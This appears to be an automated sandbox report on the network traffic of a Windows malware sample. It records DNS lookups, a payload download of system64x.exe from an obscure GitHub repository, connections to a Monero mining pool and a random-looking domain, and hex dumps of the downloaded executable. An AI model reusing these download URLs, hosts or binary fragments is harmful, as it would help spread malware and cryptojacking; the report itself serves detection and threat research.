                                                                        Jul 14, 2024 23:41:36.956465960 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.956556082 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.956562996 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.956604958 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.956639051 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.956644058 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.956665993 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.956700087 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.956711054 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.956752062 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.957602978 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:44.022341967 CEST4973410128192.168.2.5149.102.143.109
                                                                        Jul 14, 2024 23:41:44.027496099 CEST1012849734149.102.143.109192.168.2.5
                                                                        Jul 14, 2024 23:41:44.028357983 CEST4973410128192.168.2.5149.102.143.109
                                                                        Jul 14, 2024 23:41:44.028357983 CEST4973410128192.168.2.5149.102.143.109
                                                                        Jul 14, 2024 23:41:44.033241987 CEST1012849734149.102.143.109192.168.2.5
                                                                        Jul 14, 2024 23:41:44.686685085 CEST1012849734149.102.143.109192.168.2.5
                                                                        Jul 14, 2024 23:41:44.828465939 CEST4973410128192.168.2.5149.102.143.109
                                                                        Jul 14, 2024 23:41:45.027498007 CEST1012849734149.102.143.109192.168.2.5
                                                                        Jul 14, 2024 23:41:45.124509096 CEST4973410128192.168.2.5149.102.143.109
                                                                        Jul 14, 2024 23:41:45.613734961 CEST49735443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:41:45.613775015 CEST44349735172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:41:45.613996983 CEST49735443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:41:45.627741098 CEST49735443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:41:45.627757072 CEST44349735172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:41:46.112586975 CEST44349735172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:41:46.114176035 CEST49735443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:41:46.114192963 CEST44349735172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:41:46.115077972 CEST44349735172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:41:46.115123987 CEST49735443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:41:46.117012024 CEST49735443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:41:46.117069006 CEST44349735172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:41:46.117322922 CEST49735443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:41:46.117330074 CEST44349735172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:41:46.324507952 CEST44349735172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:41:46.324573040 CEST49735443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:41:46.382782936 CEST44349735172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:41:46.382878065 CEST44349735172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:41:46.382972956 CEST49735443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:41:46.390496969 CEST49735443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:41:46.390517950 CEST44349735172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:41:46.390584946 CEST49735443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:42:15.139446020 CEST1012849734149.102.143.109192.168.2.5
                                                                        Jul 14, 2024 23:42:15.217461109 CEST4973410128192.168.2.5149.102.143.109
                                                                        Jul 14, 2024 23:42:44.037194014 CEST49744443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:42:44.037255049 CEST44349744172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:42:44.037348986 CEST49744443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:42:44.059079885 CEST49744443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:42:44.059115887 CEST44349744172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:42:44.520665884 CEST44349744172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:42:44.522258997 CEST49744443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:42:44.522284985 CEST44349744172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:42:44.524084091 CEST44349744172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:42:44.524183989 CEST49744443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:42:44.526702881 CEST49744443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:42:44.526807070 CEST44349744172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:42:44.526982069 CEST49744443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:42:44.526989937 CEST44349744172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:42:44.527151108 CEST49744443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:42:44.572503090 CEST44349744172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:42:44.788249969 CEST44349744172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:42:44.788516998 CEST44349744172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:42:44.788570881 CEST49744443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:42:44.798933029 CEST49744443192.168.2.5172.67.206.184
                                                                        Jul 14, 2024 23:42:44.798954010 CEST44349744172.67.206.184192.168.2.5
                                                                        Jul 14, 2024 23:42:45.180202007 CEST1012849734149.102.143.109192.168.2.5
                                                                        Jul 14, 2024 23:42:45.233062029 CEST4973410128192.168.2.5149.102.143.109
                                                                        Jul 14, 2024 23:43:15.336769104 CEST1012849734149.102.143.109192.168.2.5
                                                                        Jul 14, 2024 23:43:15.545567989 CEST4973410128192.168.2.5149.102.143.109
                                                                        Jul 14, 2024 23:43:24.742027998 CEST1012849734149.102.143.109192.168.2.5
                                                                        Jul 14, 2024 23:43:24.858035088 CEST4973410128192.168.2.5149.102.143.109

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jul 14, 2024 23:41:31.497489929 CEST5223353192.168.2.51.1.1.1
                                                                        Jul 14, 2024 23:41:31.505983114 CEST53522331.1.1.1192.168.2.5
                                                                        Jul 14, 2024 23:41:34.028191090 CEST5517953192.168.2.51.1.1.1
                                                                        Jul 14, 2024 23:41:34.035373926 CEST53551791.1.1.1192.168.2.5
                                                                        Jul 14, 2024 23:41:44.012006044 CEST6465553192.168.2.51.1.1.1
                                                                        Jul 14, 2024 23:41:44.019701958 CEST53646551.1.1.1192.168.2.5
                                                                        Jul 14, 2024 23:41:45.501876116 CEST6089553192.168.2.51.1.1.1
                                                                        Jul 14, 2024 23:41:45.612310886 CEST53608951.1.1.1192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Jul 14, 2024 23:41:31.497489929 CEST192.168.2.51.1.1.10x31bcStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                        Jul 14, 2024 23:41:34.028191090 CEST192.168.2.51.1.1.10x20b6Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                        Jul 14, 2024 23:41:44.012006044 CEST192.168.2.51.1.1.10x575bStandard query (0)gulf.moneroocean.streamA (IP address)IN (0x0001)false
                                                                        Jul 14, 2024 23:41:45.501876116 CEST192.168.2.51.1.1.10x7daeStandard query (0)wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.orgA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Jul 14, 2024 23:41:31.505983114 CEST1.1.1.1192.168.2.50x31bcNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                        Jul 14, 2024 23:41:34.035373926 CEST1.1.1.1192.168.2.50x20b6No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                        Jul 14, 2024 23:41:34.035373926 CEST1.1.1.1192.168.2.50x20b6No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                        Jul 14, 2024 23:41:34.035373926 CEST1.1.1.1192.168.2.50x20b6No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                        Jul 14, 2024 23:41:34.035373926 CEST1.1.1.1192.168.2.50x20b6No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                        Jul 14, 2024 23:41:44.019701958 CEST1.1.1.1192.168.2.50x575bNo error (0)gulf.moneroocean.streammonerooceans.streamCNAME (Canonical name)IN (0x0001)false
                                                                        Jul 14, 2024 23:41:44.019701958 CEST1.1.1.1192.168.2.50x575bNo error (0)monerooceans.stream149.102.143.109A (IP address)IN (0x0001)false
                                                                        Jul 14, 2024 23:41:45.612310886 CEST1.1.1.1192.168.2.50x7daeNo error (0)wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org172.67.206.184A (IP address)IN (0x0001)false
                                                                        Jul 14, 2024 23:41:45.612310886 CEST1.1.1.1192.168.2.50x7daeNo error (0)wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org104.21.61.58A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • github.com
                                                                        • raw.githubusercontent.com
                                                                        • wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549727140.82.121.3443612C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-07-14 21:41:32 UTC170OUTGET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blob/main/system64x.exe?raw=true HTTP/1.1
                                                                        Host: github.com
                                                                        Connection: Keep-Alive
                                                                        2024-07-14 21:41:32 UTC569INHTTP/1.1 302 Found
                                                                        Server: GitHub.com
                                                                        Date: Sun, 14 Jul 2024 21:41:32 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                        Location: https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw/main/system64x.exe
                                                                        Cache-Control: no-cache
                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                        X-Frame-Options: deny
                                                                        X-Content-Type-Options: nosniff
                                                                        X-XSS-Protection: 0
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        2024-07-14 21:41:32 UTC3474INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                        2024-07-14 21:41:32 UTC223INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 6f 67 67 65 64 5f 69 6e 3d 6e 6f 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 67 69 74 68 75 62 2e 63 6f 6d 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 31 34 20 4a 75 6c 20 32 30 32 35 20 32 31 3a 34 31 3a 33 32 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 58 2d 47 69 74 48 75 62 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 37 46 43 30 3a 31 41 42 42 43 35 3a 37 43 30 33 34 31 43 3a 37 46 32 33 32 31 37 3a 36 36 39 34 34 36 30 43 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                        Data Ascii: Set-Cookie: logged_in=no; Path=/; Domain=github.com; Expires=Mon, 14 Jul 2025 21:41:32 GMT; HttpOnly; Secure; SameSite=LaxContent-Length: 0X-GitHub-Request-Id: 7FC0:1ABBC5:7C0341C:7F23217:6694460Cconnection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549728140.82.121.3443612C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-07-14 21:41:33 UTC136OUTGET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw/main/system64x.exe HTTP/1.1
                                                                        Host: github.com
                                                                        2024-07-14 21:41:34 UTC611INHTTP/1.1 302 Found
                                                                        Server: GitHub.com
                                                                        Date: Sun, 14 Jul 2024 21:41:33 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                        Access-Control-Allow-Origin:
                                                                        Location: https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exe
                                                                        Cache-Control: no-cache
                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                        X-Frame-Options: deny
                                                                        X-Content-Type-Options: nosniff
                                                                        X-XSS-Protection: 0
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        2024-07-14 21:41:34 UTC3029INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549729185.199.109.133443612C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-07-14 21:41:34 UTC171OUTGET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exe HTTP/1.1
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        2024-07-14 21:41:34 UTC898INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 2870272
                                                                        Cache-Control: max-age=300
                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                        Content-Type: application/octet-stream
                                                                        ETag: "0c99422a1499a3143c0132d15a7a061490125f4c2e74ae0e6b32c144f29fa8c2"
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: deny
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-GitHub-Request-Id: 903D:169A42:129625F:1484276:6694460E
                                                                        Accept-Ranges: bytes
                                                                        Date: Sun, 14 Jul 2024 21:41:34 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-ewr18129-EWR
                                                                        X-Cache: MISS
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1720993295.571340,VS0,VE196
                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        X-Fastly-Request-ID: 0ed784ab922fb9c965674147d0b2f4f3660fb547
                                                                        Expires: Sun, 14 Jul 2024 21:46:34 GMT
                                                                        Source-Age: 0
                                                                        2024-07-14 21:41:34 UTC1378INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 56 33 62 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 7e 00 00 00 4a 2b 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 2c 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00
                                                                        Data Ascii: MZx@xhr!L!This program cannot be run in DOS mode.$PEdV3be"~J+@@0,`
                                                                        2024-07-14 21:41:34 UTC1378INData Raw: 41 56 56 57 53 48 83 ec 20 65 48 8b 04 25 30 00 00 00 48 8b 78 08 48 8b 35 c9 7e 00 00 31 c0 f0 48 0f b1 3e 0f 94 c3 74 2e 48 39 c7 74 29 4c 8b 35 79 98 00 00 66 0f 1f 84 00 00 00 00 00 b9 e8 03 00 00 41 ff d6 31 c0 f0 48 0f b1 3e 0f 94 c3 74 05 48 39 c7 75 e7 48 8b 3d 90 7e 00 00 8b 07 83 f8 01 75 0c b9 1f 00 00 00 e8 3f 7a 00 00 eb 27 83 3f 00 74 09 c6 05 d1 bf 2b 00 01 eb 19 c7 07 01 00 00 00 48 8b 0d 7a 7e 00 00 48 8b 15 7b 7e 00 00 e8 36 7a 00 00 8b 07 83 f8 01 75 19 48 8b 0d 50 7e 00 00 48 8b 15 51 7e 00 00 e8 1c 7a 00 00 c7 07 02 00 00 00 84 db 74 05 31 c0 48 87 06 48 8b 05 e6 7d 00 00 48 8b 00 48 85 c0 74 10 31 c9 ba 02 00 00 00 45 31 c0 ff 15 c6 ed 2b 00 e8 39 06 00 00 48 8d 0d c2 0b 00 00 ff 15 b4 97 00 00 48 8b 0d e5 7d 00 00 48 89 01 48 8d 0d
                                                                        Data Ascii: AVVWSH eH%0HxH5~1H>t.H9t)L5yfA1H>tH9uH=~u?z'?t+Hz~H{~6zuHP~HQ~zt1HH}HHt1E1+9HH}HH
                                                                        2024-07-14 21:41:34 UTC1378INData Raw: 83 ec 20 80 3d ea ba 2b 00 00 74 08 48 83 c4 20 5b 5f 5e c3 c6 05 d9 ba 2b 00 01 48 8b 35 b2 79 00 00 8b 06 83 f8 ff 75 1f b8 ff ff ff ff 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 8d 48 02 ff c0 48 83 3c ce 00 75 f4 85 c0 74 25 89 c7 48 ff cf 48 89 fb 0f 1f 84 00 00 00 00 00 48 8b 44 fe 08 ff 15 dd e8 2b 00 48 ff cb 85 ff 48 89 df 75 eb 48 8d 0d c4 fe ff ff 48 83 c4 20 5b 5f 5e e9 28 fc ff ff cc cc cc cc cc cc cc cc 31 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 48 83 ec 28 48 8b 05 63 79 00 00 83 38 02 74 06 c7 00 02 00 00 00 83 fa 01 74 3c 83 fa 02 75 41 48 8d 35 2f 8f 00 00 48 8d 3d 28 8f 00 00 48 39 f7 75 14 eb 2c 66 0f 1f 84 00 00 00 00 00 48 83 c7 08 48 39 fe 74 1a 48 8b 07 48 85 c0 74 ef ff 15 51 e8 2b 00 eb e7 ba 01 00 00 00 e8 1d 09 00 00
                                                                        Data Ascii: =+tH [_^+H5yufffff.HH<ut%HHHD+HHuHH [_^(1VWH(Hcy8tt<uAH5/H=(H9u,fHH9tHHtQ+
                                                                        2024-07-14 21:41:34 UTC1378INData Raw: 00 4a 8d 0c fd 00 00 00 00 4c 8d 24 89 4e 89 74 20 20 42 c7 04 20 00 00 00 00 e8 8b 08 00 00 41 8b 4e 0c 48 01 c1 48 8b 05 a5 b5 2b 00 4a 89 4c 20 18 48 8d 54 24 28 41 b8 30 00 00 00 ff 15 bf 8d 00 00 48 85 c0 0f 84 91 00 00 00 8b 44 24 4c 83 f8 07 7e 13 83 f8 08 74 51 83 f8 40 74 4c 3d 80 00 00 00 74 45 eb 10 41 b8 04 00 00 00 83 f8 02 74 0b 83 f8 04 74 33 41 b8 40 00 00 00 48 8b 4c 24 28 48 8b 05 48 b5 2b 00 4f 8d 14 bf 4e 8d 0c d0 4a 89 4c d0 08 48 8b 54 24 40 4a 89 54 d0 10 ff 15 53 8d 00 00 85 c0 74 52 ff 05 29 b5 2b 00 48 89 f1 48 89 da 49 89 f8 e8 8b 6f 00 00 90 48 83 c4 58 5b 5f 5e 41 5c 41 5e 41 5f c3 48 8d 0d dc 75 00 00 48 89 f2 e8 3d 00 00 00 41 8b 56 08 48 8b 05 ea b4 2b 00 4b 8d 0c bf 4c 8b 44 c8 18 48 8d 0d d9 75 00 00 e8 1d 00 00 00 ff 15
                                                                        Data Ascii: JL$Nt B ANHH+JL HT$(A0HD$L~tQ@tL=tEAtt3A@HL$(HH+ONJLHT$@JTStR)+HHIoHX[_^A\A^A_HuH=AVH+KLDHu
                                                                        2024-07-14 21:41:34 UTC1378INData Raw: b0 2b 00 01 00 00 00 e9 de 00 00 00 e8 d7 f6 ff ff e9 d4 00 00 00 83 3d 83 b0 2b 00 00 0f 84 c7 00 00 00 48 8d 0d 7e b0 2b 00 ff 15 30 88 00 00 48 8b 3d 99 b0 2b 00 48 85 ff 0f 84 9d 00 00 00 48 8b 1d 49 88 00 00 4c 8b 35 1a 88 00 00 eb 11 0f 1f 84 00 00 00 00 00 48 8b 7f 10 48 85 ff 74 7c 8b 0f ff d3 48 89 c6 41 ff d6 85 c0 75 e9 48 85 f6 74 e4 48 8b 47 08 48 89 f1 ff 15 ff dd 2b 00 eb d5 48 8d 0d 1e b0 2b 00 ff 15 e8 87 00 00 8b 05 0a b0 2b 00 83 f8 01 75 4f 48 8b 0d 2e b0 2b 00 48 85 c9 74 12 90 48 8b 71 10 e8 57 6b 00 00 48 89 f1 48 85 f6 75 ef 48 c7 05 0c b0 2b 00 00 00 00 00 c7 05 d2 af 2b 00 00 00 00 00 48 8d 0d d3 af 2b 00 ff 15 7d 87 00 00 eb 0d 48 8d 0d c4 af 2b 00 ff 15 8e 87 00 00 b8 01 00 00 00 48 83 c4 28 5b 5f 5e 41 5e c3 cc cc cc cc cc cc
                                                                        Data Ascii: +=+H~+0H=+HHIL5HHt|HAuHtHGH+H++uOH.+HtHqWkHHuH++H+}H+H([_^A^
                                                                        2024-07-14 21:41:34 UTC1378INData Raw: 98 00 00 00 b9 05 00 00 00 31 d2 45 31 c0 e8 60 ee ff ff 85 c0 0f 88 ef 00 00 00 48 8b 3c 25 40 00 00 00 80 3d 6b ab 2b 00 00 0f 84 0d 06 00 00 48 8d b4 24 38 01 00 00 80 3d c1 ac 2b 00 00 74 5a 66 0f 6f 05 9d ac 2b 00 66 0f fd 05 25 6e 00 00 66 0f db 05 2d 6e 00 00 66 0f 7f 05 85 ac 2b 00 f3 0f 7e 05 8d ac 2b 00 66 0f fd 05 25 6e 00 00 66 0f db 05 2d 6e 00 00 66 0f d6 05 75 ac 2b 00 8b 05 77 ac 2b 00 83 c0 2d 0f b6 c0 66 89 05 6a ac 2b 00 c6 05 65 ac 2b 00 00 48 8d 15 44 ac 2b 00 41 b8 0c 00 00 00 48 89 f9 e8 56 65 00 00 c7 84 24 30 01 00 00 30 00 00 00 66 0f ef c0 f3 0f 7f 06 c7 46 10 00 00 00 00 f3 0f 7f 46 18 48 8b 04 25 50 00 00 00 48 89 84 24 d8 00 00 00 48 c7 84 24 e0 00 00 00 00 00 00 00 48 8d 4c 24 58 4c 8d 84 24 30 01 00 00 4c 8d 8c 24 d8 00 00
                                                                        Data Ascii: 1E1`H<%@=k+H$8=+tZfo+f%nf-nf+~+f%nf-nfu+w+-fj+e+HD+AHVe$00fFFH%PH$H$HL$XL$0L$
                                                                        2024-07-14 21:41:34 UTC1378INData Raw: 4c 89 64 24 40 8b 84 24 c8 03 00 00 89 44 24 38 0f 11 74 24 20 c7 44 24 30 00 00 00 00 41 b8 ff ff 1f 00 41 b9 ff ff 1f 00 e8 7a e8 ff ff 48 c7 c1 ff ff ff ff 48 8d 54 24 60 4c 8d 84 24 90 00 00 00 41 b9 00 80 00 00 e8 2e e8 ff ff 48 c7 c1 ff ff ff ff 48 89 da 49 89 f0 41 b9 00 80 00 00 e8 16 e8 ff ff 48 8b 4c 24 68 e8 a3 e7 ff ff 48 8b 4c 24 58 e8 99 e7 ff ff 0f 28 b4 24 40 03 00 00 48 81 c4 58 03 00 00 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 c6 05 12 a7 2b 00 01 48 b8 9d 00 80 00 80 00 9d 00 48 89 05 f7 a6 2b 00 66 c7 05 f6 a6 2b 00 41 00 48 8d 0d b7 00 00 00 e8 62 e6 ff ff c6 05 6b a5 2b 00 01 80 3d de a6 2b 00 00 0f 85 5e fb ff ff e9 95 fb ff ff c6 05 bc a6 2b 00 01 66 0f 6f 05 1a 68 00 00 66 0f 7f 05 92 a6 2b 00 48 b8 01 00 38 00 4b 00 38 00 48 89 05
                                                                        Data Ascii: Ld$@$D$8t$ D$0AAzHHT$`L$A.HHIAHL$hHL$X($@HX[]_^A\A]A^A_+HH+f+AHbk+=+^+fohf+H8K8H
